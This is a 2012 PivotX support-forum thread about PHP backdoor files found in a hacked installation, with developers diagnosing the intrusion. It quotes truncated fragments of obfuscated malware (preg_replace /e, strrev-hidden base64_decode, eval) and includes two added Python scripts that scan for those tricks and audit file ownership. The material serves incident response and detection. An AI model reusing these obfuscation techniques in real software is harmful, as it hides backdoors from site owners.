Executable files appear in PivotX 2.3.1 installation

Get help with installation and running PivotX 2.0.x here. Please do not post Extension or Theme related questions here.

Postby corkypa » Thu Feb 23, 2012 4:37 am

I had 3 executable files appear in my pivot installation.

templates/default.php begins with:

    preg_replace("/[ttcowsjwoxa]*.+[hkitnlhepz]*/ei",str_replace(" ","","    \x65

And templates/_sub_commentform_extended.php begins with:

    $csecacucgm=array_map(strrev("edoce"."d"."_46es"."ab"),array(str_replace(" ",""," "."aWYg KCF"

and ends with:

    eval ($csecacucgm[0]);

images/index.php is similar to the default.php file, but begins with:

    preg_replace("/[ihupkodkhdplcfr]*.+[ymdyneoolwob]*/ei",str_replace(" ",""," \x65 \x76  \x61


I have copies of these files.
corkypa
 
Posts: 11
Joined: Wed Sep 30, 2009 6:31 am
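The fragments quoted above share a handful of obfuscation tells: preg_replace() with the /e modifier (which evaluates the replacement as PHP), a function name hidden behind strrev(), str_replace(" ","",...) to strip spaces inserted into the payload, runs of \xNN escapes, and a final eval(). The following scanner is an added example written for this thread, not code from PivotX or from any poster. It turns those tells into detection rules and runs them over a constructed sample tree containing the three quoted fragments (truncated exactly as they are in the post) plus one harmless template; indicator names, the SAMPLES paths and the clean template are assumptions of the example.

```python
import re
import tempfile
from pathlib import Path

# Indicators modelled on the fragments quoted in this thread. None of them is
# proof of compromise on its own, but a legitimate template has no reason to use any.
INDICATORS = [
    # preg_replace() with the /e modifier evaluates the replacement as PHP code
    ("preg_replace_e_modifier",
     re.compile(r'preg_replace\s*\(\s*["\']/[^"\']*/[a-z]*e[a-z]*["\']', re.I)),
    # eval() of an assembled string
    ("eval_call", re.compile(r'\beval\s*\(')),
    # strrev("...") used to hide a function name such as base64_decode
    ("strrev_of_literal", re.compile(r'strrev\s*\(\s*["\']')),
    # runs of \xNN escapes spelling out code character by character
    ("hex_escape_run", re.compile(r'(?:\\x[0-9a-f]{2}\s*){3,}', re.I)),
    # str_replace(" ", "", ...) stripping the spaces inserted to break signatures
    ("space_stripping_decoder", re.compile(r'str_replace\s*\(\s*" "\s*,\s*""')),
]

# Constructed sample tree: the three fragments as quoted in the thread (they are
# truncated there too) plus one harmless template that must not be flagged.
SAMPLES = {
    "templates/default.php":
        r'''preg_replace("/[ttcowsjwoxa]*.+[hkitnlhepz]*/ei",str_replace(" ","","    \x65''',
    "templates/_sub_commentform_extended.php":
        r'''$csecacucgm=array_map(strrev("edoce"."d"."_46es"."ab"),array(str_replace(" ",""," "."aWYg KCF"
eval ($csecacucgm[0]);''',
    "images/index.php":
        r'''preg_replace("/[ihupkodkhdplcfr]*.+[ymdyneoolwob]*/ei",str_replace(" ",""," \x65 \x76  \x61''',
    "templates/clean.php":
        "<?php echo htmlspecialchars($title, ENT_QUOTES); ?>",
}


def scan_text(text: str) -> list:
    """Names of the indicators that fire on one file's contents, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_tree(root: Path, suffix: str = ".php") -> dict:
    """Map relative path -> indicator names for every flagged file under root."""
    flagged = {}
    for path in sorted(root.rglob(f"*{suffix}")):
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            flagged[path.relative_to(root).as_posix()] = hits
    return flagged


def scan_samples() -> dict:
    """Write the constructed samples to a temp dir and scan it (stand-alone demo)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in SAMPLES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(root)


if __name__ == "__main__":
    # Point scan_tree() at a real PivotX document root to triage an installation.
    for rel, hits in scan_samples().items():
        print(f"{rel}: {', '.join(hits)}")
```

Run against a real installation, a file that trips several indicators at once should be quarantined (copied out with its mtime and owner preserved, then removed from the web root) rather than edited in place, since the copy is what the host or the developers will want to look at.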

Re: Executable files appear in PivotX 2.3.1 installation

Postby corkypa » Thu Feb 23, 2012 4:45 am

I found 2 more php files in a subfolder of my images folder. These files and the previous 2 had different user and group ids than my own.
corkypa
 
Posts: 11
Joined: Wed Sep 30, 2009 6:31 am

Re: Executable files appear in PivotX 2.3.1 installation

Postby Harm10 » Thu Feb 23, 2012 6:46 am

Do you remember what version of 2.3.1 your installation file is? And where did you get it from?
Maybe you could download the latest 2.3.x version from http://pivotx.net/files/unstable-development/ and check again?
Quality is in the detail of things............
Harm10
Developer
 
Posts: 1608
Joined: Wed Jun 17, 2009 9:37 am
Location: Somewhere in The Netherlands (aka Holland)

Re: Executable files appear in PivotX 2.3.1 installation

Postby corkypa » Thu Feb 23, 2012 6:54 am

How would I find out exactly which version of 2.3.1 I installed? I don't seem to have the installation file, but judging from the dates on the README.txt, I installed it on Nov. 5 of last year.
corkypa
 
Posts: 11
Joined: Wed Sep 30, 2009 6:31 am

Re: Executable files appear in PivotX 2.3.1 installation

Postby hansfn » Thu Feb 23, 2012 6:59 am

These files and the previous 2 had different user and group ids than my own

Very important observation. Different user and group ids normally means that you are on a server with several users/domains and those aren't jailed (separated). If the user is a normal account, you should report that user for hacking to your ISP immediately. (That user might have been hacked himself.) If the user is the webserver user, the problem is different.

The reason you found the files in the templates/images directory is that these are world-writable.

PS! Normally Harm's advice is very good, but in this case his question is irrelevant.
hansfn
Developer
 
Posts: 3072
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Re: Executable files appear in PivotX 2.3.1 installation

Postby corkypa » Thu Feb 23, 2012 7:10 am

I did report the problem to the hosting company, hoping that the UID/GID would be a clue. They said that it looks like a php script exploit uploaded them, and there wasn't anything they could do. I have asked if the UID is the web server user, and am awaiting the reply.
corkypa
 
Posts: 11
Joined: Wed Sep 30, 2009 6:31 am

Re: Executable files appear in PivotX 2.3.1 installation

Postby hansfn » Thu Feb 23, 2012 8:10 am

OK. You can check for yourself - what is the uid/gid of, for example, db/ser_config.php (which is created by PivotX and hence owned by the web server user)?

Another question. Was it a fresh install of 2.3.1 or did you upgrade? So far all other users reporting hacking were infected (by the TimThumb exploit) before upgrading - the hacking was just discovered much later.
hansfn
Developer
 
Posts: 3072
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway
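The check hansfn describes (compare the uid/gid of the new files with a file PivotX itself wrote, such as db/ser_config.php), together with the world-writable templates/ and images/ directories mentioned earlier and the modification time corkypa used to date the files, can be scripted as one audit. The code below is an added example for this thread, not part of PivotX; it builds a constructed PivotX-like tree in a temporary directory, so the directory layout, the 30-day "old" timestamp and the 24-hour "recent" window are assumptions, and since every file created by one process has the same owner, the owner-mismatch list is necessarily empty in the demo and only fills when run against a real document root.

```python
import os
import stat
import tempfile
import time
from pathlib import Path


def _rel(root: Path, p: Path) -> str:
    return p.relative_to(root).as_posix()


def owner_of(path: Path) -> tuple:
    """uid/gid of a file PivotX wrote itself (e.g. db/ser_config.php): the web server identity."""
    st = path.stat()
    return st.st_uid, st.st_gid


def find_owner_mismatches(root: Path, ref_uid: int, ref_gid: int, suffix: str = ".php") -> list:
    """PHP files whose owner or group is not the reference identity: (path, uid, gid)."""
    hits = []
    for p in sorted(root.rglob(f"*{suffix}")):
        st = p.stat()
        if (st.st_uid, st.st_gid) != (ref_uid, ref_gid):
            hits.append((_rel(root, p), st.st_uid, st.st_gid))
    return hits


def find_world_writable_dirs(root: Path) -> list:
    """Directories any local user can drop files into (the templates/ and images/ case)."""
    dirs = [p for p in root.rglob("*") if p.is_dir()]
    return sorted(_rel(root, p) for p in dirs if p.stat().st_mode & stat.S_IWOTH)


def find_recent_php(root: Path, since: float) -> list:
    """PHP files modified at or after `since` (epoch seconds): the window to pull from the access log."""
    return sorted(_rel(root, p) for p in root.rglob("*.php") if p.stat().st_mtime >= since)


def audit(root: Path, reference: Path, since: float) -> dict:
    uid, gid = owner_of(reference)
    return {
        "owner_mismatches": find_owner_mismatches(root, uid, gid),
        "world_writable_dirs": find_world_writable_dirs(root),
        "recent_php": find_recent_php(root, since),
    }


def demo() -> dict:
    """Constructed tree: two month-old files, one freshly dropped file, two world-writable dirs."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        now = time.time()
        old = now - 30 * 86400
        files = {
            "db/ser_config.php": old,       # reference file written by PivotX
            "templates/default.php": old,
            "images/index.php": now,        # the file we expect the audit to surface
        }
        for rel, mtime in files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text("<?php // constructed sample\n")
            os.utime(p, (mtime, mtime))
        (root / "db").chmod(0o755)          # sane permissions
        (root / "templates").chmod(0o777)   # world-writable, as in the thread
        (root / "images").chmod(0o777)
        return audit(root, root / "db/ser_config.php", since=now - 86400)


if __name__ == "__main__":
    # For a real site: audit(Path("/var/www/pivotx"), Path("/var/www/pivotx/db/ser_config.php"), since)
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Files owned by the web server user but sitting in a world-writable directory point at the web application (a PHP script exploit, as the host suggested) rather than at a neighbouring account; files owned by another account point at the shared host. Either way, the recent_php list gives the time window to search in the access log, and the world-writable directories should be tightened regardless of which explanation turns out to be right.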

Re: Executable files appear in PivotX 2.3.1 installation

Postby corkypa » Thu Feb 23, 2012 7:38 pm

The UID/GID of the files are those that the web server runs under.

This was an upgrade, but I did it long ago. I am certain that the offending files were just uploaded. I got no warnings until I logged in yesterday, and the modification time is consistent with it being a recent change. Unfortunately, I see nothing odd in the access or error logs around the time of the change.
corkypa
 
Posts: 11
Joined: Wed Sep 30, 2009 6:31 am

Re: Executable files appear in PivotX 2.3.1 installation

Postby hansfn » Thu Feb 23, 2012 8:43 pm

Sure, those files might have been recently uploaded, but a remote shell/backdoor might have been uploaded a long time ago. Using the remote shell/backdoor, they can upload new files at any time. Typically they activate a hacked server only when they need it. (The same happened to a different PivotX user recently - see the similar forum thread.)

Anyway, if you have the web server access log for the period in which you think the (new) files were uploaded, I'm willing to take a look - just to confirm that you were indeed hacked a long time ago.
hansfn
Developer
 
Posts: 3072
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway
